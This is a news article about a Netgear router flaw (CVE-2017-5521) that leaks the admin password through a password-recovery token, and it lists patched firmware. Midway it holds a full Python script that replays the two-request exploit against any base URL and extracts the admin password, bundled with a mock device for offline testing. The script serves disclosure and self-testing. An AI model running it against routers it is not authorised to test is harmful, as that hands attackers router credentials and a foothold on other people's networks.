Not again, Netgear. Another serious security vulnerability has been found on a bunch of Netgear routers. This time around, the bug can expose router login passwords and can be exploited remotely. Here's a list of Netgear routers that are affected and where to get the firmware patches for each of them.
The new vulnerability (CVE-2017-5521) was discovered by a researcher from Trustwave's SpiderLabs. It allows hackers to obtain the admin password for the router through a flaw in the password recovery process. According to the CVE description:
"When trying to access the web panel, a user is asked to authenticate; if the authentication is cancelled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router."
As the description says, the bug is only exploitable when password recovery is disabled. In that state an attacker who can reach the web interface needs no credentials at all: cancelling the login prompt yields the token, and a single request to /passwordrecovered.cgi carrying that token returns the admin password. With remote management off, the web interface is reachable only from the LAN, so the attacker has to be on the network already; if remote management is also enabled, the same two requests work from the internet. Remote management is turned off by default but can be turned on by users under Advanced Settings.
The vulnerability is rated High under CVSS 3.0 and Medium under CVSS 2.0, but the SpiderLabs researcher stressed that the bug is very serious because it affects a large number of Netgear router models.
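To make the two-request flow concrete, here is an added example (written for this page, not code from Trustwave, Netgear or the CVE entry) that replays it as a check against a device you own. Because no real router is available offline, the block also contains a constructed mock of the web interface with a `vulnerable` switch: the mock's behaviour, the `id=<digits>` form of the token in the 401 page, and the `Router Admin Password:` label in the response are all assumptions made for the example; a real device may present the token and the credentials differently, so adjust the two regular expressions before pointing `check_device` at hardware.

```python
"""Replay the CVE-2017-5521 password-recovery flow: unauthenticated request to
the web panel -> token from the page the device serves -> request to
/passwordrecovered.cgi?id=TOKEN -> admin password in the response.

The mock device below is constructed for this example; its page layout
(token in an 'id=' link, 'Router Admin Password:' label) is an assumption.
"""
import re
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.parse import parse_qs, urlparse
from urllib.request import Request, urlopen

TOKEN_RE = re.compile(r"[?&]id=(\d+)")                    # assumed token form
PASSWORD_RE = re.compile(r"Router Admin Password:\s*([^<\s]+)")  # assumed label


def fetch(url):
    """GET url with no credentials; return (status, lower-cased headers, body).
    A 401 is a normal outcome here, so it is returned rather than raised."""
    req = Request(url, headers={"User-Agent": "cve-2017-5521-check"})
    try:
        with urlopen(req, timeout=5) as resp:
            hdrs = {k.lower(): v for k, v in resp.headers.items()}
            return resp.status, hdrs, resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        hdrs = {k.lower(): v for k, v in err.headers.items()}
        return err.code, hdrs, err.read().decode("utf-8", "replace")


def extract_token(headers, body):
    """Look for the recovery token in a redirect target or in the page body."""
    for candidate in (headers.get("location", ""), body):
        match = TOKEN_RE.search(candidate)
        if match:
            return match.group(1)
    return None


def check_device(base_url):
    """Run the flow against base_url and report what the device disclosed."""
    _, headers, body = fetch(base_url + "/")
    token = extract_token(headers, body)
    result = {"token": token, "vulnerable": False, "password": None}
    if token is None:                     # nothing to hand to passwordrecovered.cgi
        return result
    status, _, body = fetch(f"{base_url}/passwordrecovered.cgi?id={token}")
    match = PASSWORD_RE.search(body)
    if status == 200 and match:           # credentials returned without any auth
        result["vulnerable"] = True
        result["password"] = match.group(1)
    return result


class MockNetgear(BaseHTTPRequestHandler):
    """Constructed stand-in for the router's web interface."""
    token = "1234567890"                  # constructed value
    admin_password = "s3cret-constructed"
    vulnerable = True                     # overridden per instance by start_mock

    def log_message(self, *args):         # keep the example quiet
        pass

    def do_GET(self):
        url = urlparse(self.path)
        if url.path == "/passwordrecovered.cgi":
            supplied = parse_qs(url.query).get("id", [""])[0]
            if self.vulnerable and supplied == self.token:
                self._send(200, "<html><body>Router Admin Username: admin<br>"
                                f"Router Admin Password: {self.admin_password}"
                                "</body></html>")
            else:
                self._send(401, "<html><body>Unauthorized</body></html>")
            return
        # Every other page demands credentials. The vulnerable variant leaks the
        # token in the link behind the login prompt's Cancel action.
        link = (f'<a href="/passwordrecovered.cgi?id={self.token}">Cancel</a>'
                if self.vulnerable else "")
        self._send(401, f"<html><body>Authentication required. {link}</body></html>",
                   {"WWW-Authenticate": 'Basic realm="NETGEAR"'})

    def _send(self, code, body, extra=None):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        for name, value in (extra or {}).items():
            self.send_header(name, value)
        self.end_headers()
        self.wfile.write(data)


def start_mock(vulnerable):
    """Start a mock device on a free loopback port; return (server, base_url)."""
    handler = type("Mock", (MockNetgear,), {"vulnerable": vulnerable})
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


if __name__ == "__main__":
    for flag in (True, False):
        server, url = start_mock(vulnerable=flag)
        print("vulnerable firmware" if flag else "patched firmware", check_device(url))
        server.shutdown()
```

The checker never sends credentials of its own, which is the point of the bug: a device that answers `/passwordrecovered.cgi` with the admin password in this flow is disclosing it to anyone who can reach the interface, and the `vulnerable` switch on the mock shows the contrast with a device that refuses. Run it only against routers you are authorised to test.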
"We have found more than ten thousand vulnerable devices that are remotely accessible. The real number of affected devices is probably in the hundreds of thousands, if not over a million," the researcher said in a blog post. "As many people reuse their password, having the admin password of the router gives us an initial foothold on the network. We can see all the devices connected to the network and try to access them with that same admin password.
"With malware such as the Mirai botnet being out there, it is also possible that some of the vulnerable routers could be infected and ultimately used as bots as well. If running a bot is not possible, the DNS can be easily changed to a rogue one, as described by Proofpoint, to further infect machines on the network."
While the major vulnerability that was revealed in December last year was left unfixed for a while, this time around patches are readily available. Here's a list of affected Netgear routers and you can click on each of them to get the corresponding firmware patch:
- C6300 (firmware released to ISPs)
If your Netgear router is affected, get the firmware updates now.